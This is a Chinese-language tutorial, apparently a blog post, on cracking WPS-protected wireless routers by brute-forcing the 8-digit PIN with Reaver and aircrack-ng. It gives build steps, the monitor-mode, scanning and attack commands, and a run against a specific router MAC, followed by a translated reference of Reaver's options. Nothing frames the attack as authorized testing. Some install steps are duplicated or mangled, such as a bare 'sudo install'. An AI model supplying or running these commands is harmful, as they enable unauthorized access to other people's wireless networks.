需要工具:reaver
原理:窮舉PIN碼以攻破無線路由器的安全防護
安裝:
下載源碼
解壓
tar-xzvf reaver-1.4.tar.gz
安裝必要的軟件依賴庫和工具
在您編譯reaver前需要先安裝pcaplib等工具,後面還需要aircrack-ng
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
編譯和安裝
配置和編譯Reaver
cd reaver-1.4
cd src
./configure
make
下載aircrack-ng源代碼並編譯
從Ubuntu12.04版本開始aircrack-ng不再被包含在版本軟件倉庫中,不過我們可以從網上下載它的源代碼進行編譯安裝。如果aircrack-ng已經存在,則不必安裝。./configure
make
sudo install
解壓 tar -xzvf reaver-1.4.tar.gz
安裝必要的軟件依賴庫和工具
在您編譯 reaver前需要先安裝 pcaplib等工具,後面還需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
編譯和安裝
配置和編譯 Reaver
cd reaver-1.4 cd src ./configure make
安裝 Reaver
sudo make install
方法:
1 輸入:airmon-ng start wlan0 開啟監聽模式 (屏幕顯示 加載8187L驅動成功–一次就加載成功啊!)
2 輸入:wash -i mon0 -C 查看所有開啟WPS的無線路由 長時間無反應按Ctrl+C,結束進程,這時記下你要PJ的目標路由MAC.
3 輸入:airodump-ng mon0 網卡以混雜模式掃描所有頻道—並顯示所有AP的信息(包括 AP的信號強度,ESSID,MAC,頻道,加密方式,等等…..),按Ctrl+C,結束掃描.
注:如果你已知對方無線路由信息 第2,第3步 可省略!
4 輸入:reaver -i mon0 -b MAC -a -S -vv 開始窮舉pin碼
注:隨時可以按CTRL+C退出保存進程,下次按下光標控制鍵“上”鍵然後回車,進程可繼續。
實戰我輸入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只見屏幕飛閃……爽啊!
reaver 參數詳解
必須參數
-i, –interface=<wlan> Name of the monitor-mode interface to use
網卡的監視接口,通常是mon0
-b, –bssid=<mac> BSSID of the target AP
AP的MAC地址
Optional Arguments: 可選參數
-m, –mac=<mac> MAC of the host system
指定本機MAC地址
-e, –essid=<ssid> ESSID of the target AP
路由器的ESSID,一般不用指定
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
信號的頻道,如果不指定會自動掃描
-o, –out-file=<file> Send output to a log file [stdout]
輸出日志文件
-s, –session=<file> Restore a previous session file
恢復進度文件
-C, –exec=<command> Execute the supplied command upon successful pin recovery
pin成功後執行命令
-D, –daemonize Daemonize reaver
設置reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP
對目標AP自動檢測高級參數
-f, –fixed Disable channel hopping
禁止頻道跳轉
-5, –5ghz Use 5GHz 802.11 channels
使用5G頻道
-v, –verbose Display non-critical warnings (-vv for more)
顯示不重要警告信息 -vv 可以顯示更多
-q, –quiet Only display critical messages
只顯示關鍵信息
-h, –help Show help
顯示幫助
Advanced Options:高級選項
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
使用指定的4位或者8位pin碼
-d, –delay=<seconds> Set the delay between pin attempts [1]
pin間延時,默認1秒
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
AP鎖定WPS後等待時間
-g, –max-attempts=<num> Quit after num pin attempts
最大pin次數
Reaver 參數
—天天
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
10次意外失敗後等待時間,默認0秒
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
每x次pin後等待y秒
-t, –timeout=<seconds> Set the receive timeout period [5]
收包超時,默認5秒
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
M5/M7超時,默認0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)
不連入AP(連入過程必須有其他程序完成)
-N, –no-nacks Do not send NACK messages when out of order packets are received
不發送NACK信息(如果一直pin不動,可以嘗試這個參數)
-S, –dh-small Use small DH keys to improve crack speed
使用小DH關鍵值提高速度(推薦使用)
-L, –ignore-locks Ignore locked state reported by the target AP
忽略目標AP報告的鎖定狀態
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
每當收到EAP失敗包就終止WPS進程
-n, –nack Target AP always sends a NACK [Auto]
對目標AP總是發送NACK,默認自動
-w, –win7 Mimic a Windows 7 registrar [False]
模擬win7注冊,默認關閉
Ps:影響到無線的因素很多,所以各參數之間的配合很重要,當然,最關鍵的還是取決於信號。
原理詳細:
什麼是PIN碼?
印在無線路由器設備標簽上的一組8位數字字符串,無線路由器管理界面中當然也會存在並可更改。
PIN碼有什麼用?
在無線網卡的配套管理軟件(如TP-LINK的QSS軟件)裡輸入無線路由器設備上的那8位數字字符串就可以成功登錄該已被加密的無線路由器。
窮舉PIN碼是什麼意思?
既然知道了無線路由器PIN值的范圍(8位純數字),且目前大部分設備的WPS是呈開啟狀態的,那麼窮舉PIN碼以攻破無線路由器的安全防護這一暴力行為就有了*理論*可行性